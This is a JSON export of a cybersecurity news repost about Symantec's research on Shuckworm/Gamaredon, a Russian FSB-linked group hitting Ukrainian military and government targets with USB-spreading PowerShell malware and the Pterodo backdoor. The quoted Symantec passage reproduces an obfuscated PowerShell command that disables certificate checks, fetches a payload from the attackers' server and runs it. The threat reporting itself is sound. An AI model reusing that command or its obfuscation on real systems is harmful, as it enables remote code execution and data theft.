{"id":52395,"date":"2023-06-15T15:29:06","date_gmt":"2023-06-15T15:29:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/34721\/Russia-Hackers-Unleash-New-USB-Based-Malware-On-Ukraines-Military.html"},"modified":"2023-06-15T15:29:06","modified_gmt":"2023-06-15T15:29:06","slug":"russia-hackers-unleash-new-usb-based-malware-on-ukraines-military","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/","title":{"rendered":"Russia Hackers Unleash New USB-Based Malware On Ukraine&#8217;s Military"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/04\/russia-cyber-hack-800x534.jpeg\" alt=\"Russia-backed hackers unleash new USB-based malware on Ukraine\u2019s military\"><figcaption class=\"caption\">\n<div class=\"caption-credit\">Getty Images<\/div>\n<\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/information-technology\/2023\/06\/russia-backed-hackers-unleash-new-usb-based-malware-on-ukraines-military\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">55<\/span> <span class=\"visually-hidden\"> with <\/span> <\/a> <\/aside>\n<p> <!-- cache hit 6:single\/related:6c61c0e19306cc9735ee6733781806b1 --><!-- empty --><\/p>\n<p>Hackers working for Russia\u2019s Federal Security Service have mounted multiple cyberattacks that used USB-based malware to steal large amounts of data from Ukrainian targets for use in its ongoing invasion of its smaller neighbor, researchers said.<\/p>\n<p>\u201cThe sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information,\u201d researchers from Symantec, now owned by Broadcom, wrote in a <a href=\"https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/shuckworm-russia-ukraine-military\">Thursday post<\/a>. \u201cThere were indications in some organizations that the attackers were on the machines of the organizations\u2019 human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.\u201d<\/p>\n<p>The group, which Symantec tracks as Shuckworm and other researchers call Gamaredon and Armageddon, has been active since 2014 and has been linked to Russia\u2019s FSB, the principal security service in that country. The group focuses solely on obtaining intelligence on Ukrainian targets. In 2020, researchers at security firm SentinelOne <a href=\"https:\/\/www.sentinelone.com\/blog\/who-are-the-gamaredon-group-and-what-do-they-want\/\">said<\/a> the hacking group had \u201cattacked over 5,000 individual entities across the Ukraine, with particular focus on areas where Ukrainian troops are deployed.\u201d<\/p>\n<p>In February, Shuckworm began deploying new malware and command-and-control infrastructure that has successfully penetrated the defenses of multiple Ukrainian organizations in the military, security services, and government of that country. Group members seem most interested in obtaining information related to sensitive military information that could be abused in Russia\u2019s ongoing invasion.<\/p>\n<p>This newer campaign debuted new malware in the form of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script activates when infected USB drives are connected to targeted computers. The malicious script first copies itself onto the targeted machine to create a shortcut file with the extension rtf.lnk. The files have names such as video_porn.rtf.lnk, do_not_delete.rtf.lnk, and evidence.rtf.lnk. The names, which are mostly in the Ukrainian language, are an attempt to entice targets to open the files so they will install Pterodo on machines.<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<p>The script goes on to enumerate all drives connected to the targeted computer and to copy itself to all attached removable drives, most likely in hopes of infecting any air-gapped devices, which are intentionally not connected to the Internet in an attempt to prevent them from being hacked.<\/p>\n<p>To cover its tracks, Shuckworm has created dozens of variants and rapidly rotated the IP addresses and infrastructure it uses for command and control. The group also uses legitimate services such as Telegram and its micro-blogging platform Telegraph for command and control in another attempt to avoid detection.<\/p>\n<p>Shuckworm typically uses phishing emails as an initial vector into targets\u2019 computers. The emails contain malicious attachments that masquerade as files with extensions, including .docx, .rar, .sfx, lnk, and hta. Emails often use topics such as armed conflicts, criminal proceedings, combating crime, and protecting children as lures to get targets to open the emails and click on the attachments.<\/p>\n<p>Symantec researchers said that an infected computer they recovered in the campaign was typical for the way it works. They wrote:<\/p>\n<blockquote>\n<p>In one victim, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious Document.<\/p>\n<p>After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&amp;C server:<\/p>\n<p>&#8220;CSIDL_SYSTEM\\cmd.exe&#8221; \/c start \/min &#8220;&#8221; powershell -w hidden<br \/>&#8220;$gt=&#8217;\/get.&#8217;+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4<br \/>8);[system.net.servicepointmanager]::servercertificatevalidationcallb<br \/>ack={$true};$hosta+=&#8217;.vafikgo.&#8217;;$hosta+=[char](57+57);$hosta+=[char](<br \/>60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad<br \/>dresslist[0];$client=(new-object<br \/>net.webclient);$faddr=&#8217;htt&#8217;+&#8217;ps:\/\/&#8217;+$addr+$gt;$text=$client.downloads<br \/>tring($faddr);iex $text&#8221;<\/p>\n<p>More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.<\/p>\n<p>Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.<\/p>\n<\/blockquote>\n<p>Thursday\u2019s post includes IP addresses, hashes, file names, and other indicators of compromise people can use to detect if they have been targeted. The post also warns that the group poses a threat that targets should take seriously.<\/p>\n<p>\u201cThis activity demonstrates that Shuckworm\u2019s relentless focus on Ukraine continues,\u201d they wrote. \u201cIt seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations.\u201d<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/34721\/Russia-Hackers-Unleash-New-USB-Based-Malware-On-Ukraines-Military.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":52396,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[10562],"class_list":["post-52395","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlinegovernmentmalwarerussiacyberwarmilitaryukraine"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Russia Hackers Unleash New USB-Based Malware On Ukraine&#039;s Military 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Russia Hackers Unleash New USB-Based Malware On Ukraine&#039;s Military 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-15T15:29:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/04\/russia-cyber-hack-800x534.jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Russia Hackers Unleash New USB-Based Malware On Ukraine&#8217;s Military\",\"datePublished\":\"2023-06-15T15:29:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/\"},\"wordCount\":775,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg\",\"keywords\":[\"headline,government,malware,russia,cyberwar,military,ukraine\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/\",\"name\":\"Russia Hackers Unleash New USB-Based Malware On Ukraine's Military 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg\",\"datePublished\":\"2023-06-15T15:29:06+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg\",\"width\":800,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,government,malware,russia,cyberwar,military,ukraine\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinegovernmentmalwarerussiacyberwarmilitaryukraine\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Russia Hackers Unleash New USB-Based Malware On Ukraine&#8217;s Military\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Russia Hackers Unleash New USB-Based Malware On Ukraine's Military 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/","og_locale":"en_US","og_type":"article","og_title":"Russia Hackers Unleash New USB-Based Malware On Ukraine's Military 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-06-15T15:29:06+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/04\/russia-cyber-hack-800x534.jpeg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Russia Hackers Unleash New USB-Based Malware On Ukraine&#8217;s Military","datePublished":"2023-06-15T15:29:06+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/"},"wordCount":775,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg","keywords":["headline,government,malware,russia,cyberwar,military,ukraine"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/","url":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/","name":"Russia Hackers Unleash New USB-Based Malware On Ukraine's Military 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg","datePublished":"2023-06-15T15:29:06+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military.jpg","width":800,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/russia-hackers-unleash-new-usb-based-malware-on-ukraines-military\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,government,malware,russia,cyberwar,military,ukraine","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinegovernmentmalwarerussiacyberwarmilitaryukraine\/"},{"@type":"ListItem","position":3,"name":"Russia Hackers Unleash New USB-Based Malware On Ukraine&#8217;s Military"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=52395"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52395\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/52396"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=52395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=52395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=52395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}